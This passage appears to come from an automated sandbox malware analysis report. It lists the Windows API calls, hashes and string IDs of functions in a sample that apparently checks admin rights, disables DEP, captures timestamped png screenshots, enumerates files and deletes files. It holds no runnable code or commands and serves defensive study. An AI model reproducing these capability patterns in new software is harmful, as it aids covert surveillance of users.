                                                • GetProcAddress.KERNEL32(00000000), ref: 00409073
                                                • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00409084
                                                • GetProcAddress.KERNEL32(00000000), ref: 00409087
                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00409099
                                                • GetProcAddress.KERNEL32(00000000), ref: 0040909C
                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004090A9
                                                • GetProcAddress.KERNEL32(00000000), ref: 004090AC
                                                • GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004090BD
                                                • GetProcAddress.KERNEL32(00000000), ref: 004090C0
                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004090CD
                                                • GetProcAddress.KERNEL32(00000000), ref: 004090D0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$HandleModule$LibraryLoad
                                                • String ID: GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$Psapi.dll$SetProcessDEPPolicy$Shell32$kernel32$kernel32.dll
                                                • API String ID: 551388010-3266460993
                                                • Opcode ID: 21593a0b256e8a2cfc5ade98b8b954114bbfc078fb699abbcbb9f07ba6c57c36
                                                • Instruction ID: e2e5716fddf3a60e450527925cfbd32ed5e5a225cb0b5d279c510540278e33a3
                                                • Opcode Fuzzy Hash: 21593a0b256e8a2cfc5ade98b8b954114bbfc078fb699abbcbb9f07ba6c57c36
                                                • Instruction Fuzzy Hash: B7111CF0E443547ACA106FB6BC59ECB6E9DFAC9B597214437F104E3190DABC99808E6C
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 0040FC6E
                                                • GdiplusStartup.GDIPLUS(00419E14,?,00000000,00000000,00000000,00000000), ref: 0040FCA7
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000001A), ref: 0040FCCB
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000019,00000000), ref: 0040FCDD
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040FCFD
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040FD09
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040FD15
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040FD1E
                                                • CreateDirectoryW.KERNEL32(00000000), ref: 0040FD25
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 0040FD38
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 0040FD4B
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00413864), ref: 0040FDAA
                                                • Sleep.KERNEL32(000003E8), ref: 0040FDC7
                                                • GetLocalTime.KERNEL32(?), ref: 0040FDD2
                                                • swprintf.MSVCRT(?,XKA,?,?,?,?,?,?), ref: 0040FE15
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00419E68,00413888,?,00413864), ref: 0040FE3B
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00413864), ref: 0040FE4B
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,00413864), ref: 0040FE5B
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00413864), ref: 0040FE6A
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00413864), ref: 0040FE76
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00413864), ref: 0040FE82
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00413864), ref: 0040FE8E
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,00413864), ref: 0040FE9E
                                                  • Part of subcall function 0040FA6E: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0040FEAA,?,png,00419BC8), ref: 0040FA87
                                                  • Part of subcall function 0040FA6E: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040FA92
                                                  • Part of subcall function 0040FA6E: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040FA9D
                                                  • Part of subcall function 0040FA6E: LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040FAC2
                                                  • Part of subcall function 0040FA6E: GetProcAddress.KERNEL32(00000000), ref: 0040FAC9
                                                  • Part of subcall function 0040FA6E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040FAD7
                                                  • Part of subcall function 0040FA6E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040FAE1
                                                  • Part of subcall function 0040FA6E: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000,00000000), ref: 0040FB10
                                                  • Part of subcall function 0040FA6E: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000), ref: 0040FB2D
                                                  • Part of subcall function 0040FA6E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FB43
                                                  • Part of subcall function 0040FA6E: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040FB50
                                                  • Part of subcall function 0040FA6E: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040FB69
                                                  • Part of subcall function 0040FA6E: DeleteFileW.KERNEL32(00000000), ref: 0040FB70
                                                  • Part of subcall function 0040FA6E: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040FB7D
                                                  • Part of subcall function 0040FA6E: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040FB86
                                                  • Part of subcall function 0040FA6E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040FB9B
                                                  • Part of subcall function 0040FA6E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040FBA5
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000015,?,?,?,?,?,?,?,00413864), ref: 0040FEBC
                                                • atoi.MSVCRT(00000000,?,?,?,?,?,?,?,00413864), ref: 0040FEC3
                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00413864), ref: 0040FED1
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000018,?,?,?,?,?,?,?,00413864), ref: 0040FEEA
                                                • atoi.MSVCRT(00000000,?,?,?,?,?,?,?,00413864), ref: 0040FEF1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$D@2@@std@@D@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@$G@2@@0@Hstd@@V10@V?$basic_string@$?data@?$basic_string@G@1@@V01@@$??4?$basic_string@?size@?$basic_string@SleepV01@atoi$?length@?$basic_string@AddressCreateD@1@@DeleteDirectoryFileGdiplusH_prologLibraryLoadLocalProcStartupTimeswprintf
                                                • String ID: XKA
                                                • API String ID: 524960498-2411217362
                                                • Opcode ID: 142451fb39d04cd77e3b131fa460c0b1b53982a89bcb1b6331a5f7176b8acc27
                                                • Instruction ID: 6aa118ed464d52dc764fa596c555646475bd38f969dfe4ec328eee1aa5caf3d4
                                                • Opcode Fuzzy Hash: 142451fb39d04cd77e3b131fa460c0b1b53982a89bcb1b6331a5f7176b8acc27
                                                • Instruction Fuzzy Hash: 07616371900219AFCF50AFA1DC5DBEE7B7CAB44305F0040FAF50AA6191DB785B898B5D
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040C5D5
                                                • SetEvent.KERNEL32(?), ref: 0040C5DE
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040C5E7
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6C995E04), ref: 0040C602
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419288), ref: 0040C613
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040C625
                                                  • Part of subcall function 00411550: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041155F
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411576
                                                  • Part of subcall function 00411550: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C), ref: 0041158C
                                                  • Part of subcall function 00411550: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 004115AA
                                                  • Part of subcall function 00411550: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115B4
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115BD
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115D2
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115DF
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411631
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041163A
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411643
                                                • GetTickCount.KERNEL32 ref: 0040C65C
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00419288,00000000,?,?,00000000), ref: 0040C6BC
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00419288,00000000,?,?,00000000), ref: 0040C6CC
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00419288,00000000,?,?,00000000), ref: 0040C6DC
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00419288,00000000,?,?,00000000), ref: 0040C6EC
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00419288,00000000,?,?), ref: 0040C6FC
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00419288), ref: 0040C706
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004C), ref: 0040C722
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C72E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C73A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C746
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C752
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C75E
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040C76A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C776
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C782
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040C794
                                                • atoi.MSVCRT(00000000), ref: 0040C79B
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@V01@@$?length@?$basic_string@V12@$?c_str@?$basic_string@?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@CountD@1@@EventG@2@@std@@G@std@@TickV01@atoi
                                                • String ID:
                                                • API String ID: 2768269293-0
                                                • Opcode ID: 65c9ac0af3eee88ef9f6e8c40d1a65f52c514568fcb25a50af4b74a21dbc26c1
                                                • Instruction ID: ba60c0b36e1abbb58d34c5f0d092d0536e361110913101efae3fc3b40cd7302a
                                                • Opcode Fuzzy Hash: 65c9ac0af3eee88ef9f6e8c40d1a65f52c514568fcb25a50af4b74a21dbc26c1
                                                • Instruction Fuzzy Hash: 3E51617290011AABCB14BBA1DD5A9EE777CEB10309F0045BEF106E31A1EE385B498B59
                                                APIs
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00403203
                                                • FindFirstFileW.KERNEL32(00000000), ref: 0040320A
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,00000000,?,?,?,?), ref: 00403237
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000054), ref: 00403258
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00403241
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040326D
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00413864), ref: 00403286
                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 0040328D
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040329A
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 004032B8
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004032C2
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004032CB
                                                • FindNextFileW.KERNEL32(?,?), ref: 004032E1
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 004032F6
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 00403305
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00403311
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040331A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403323
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,?), ref: 0040334B
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00403355
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000050,?,?,?,?,?,?), ref: 0040336C
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00403375
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040337E
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00403387
                                                  • Part of subcall function 004113BA: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113C5
                                                  • Part of subcall function 004113BA: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113D1
                                                  • Part of subcall function 004113BA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113DB
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@std@@$??0?$basic_string@G@2@@std@@V?$basic_string@$D@2@@0@Hstd@@V10@0@$D@1@@$V01@@$??4?$basic_string@?c_str@?$basic_string@FileFindV01@$??9std@@?length@?$basic_string@FirstG@1@@G@2@@0@Next
                                                • String ID:
                                                • API String ID: 2097282260-0
                                                • Opcode ID: 86f04fed1afdc9e1d3f247f9863f7772f553e519213c8ed7607902a90e0c023d
                                                • Instruction ID: e2176cce89367e2721bef7b1cfe0db9c414fcd567cc24aa7813325dec7316575
                                                • Opcode Fuzzy Hash: 86f04fed1afdc9e1d3f247f9863f7772f553e519213c8ed7607902a90e0c023d
                                                • Instruction Fuzzy Hash: C8519D7294010EABCB04EF90DC59DDF7B7CEB55316F04416AF506E30A0EA74A789CB98
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040D9FB
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00419E68,00414964), ref: 0040DA0F
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040DA21
                                                • FindFirstFileW.KERNEL32(00000000), ref: 0040DA28
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00413864), ref: 0040DA50
                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 0040DA5D
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA6A
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 0040DA8D
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040DA97
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DAA3
                                                • FindNextFileW.KERNEL32(?,?), ref: 0040DAB9
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0041388C), ref: 0040DAD5
                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 0040DADC
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040DAE9
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 0040DB0A
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040DB14
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DB20
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040DB3B
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000005D), ref: 0040DB50
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040DB59
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
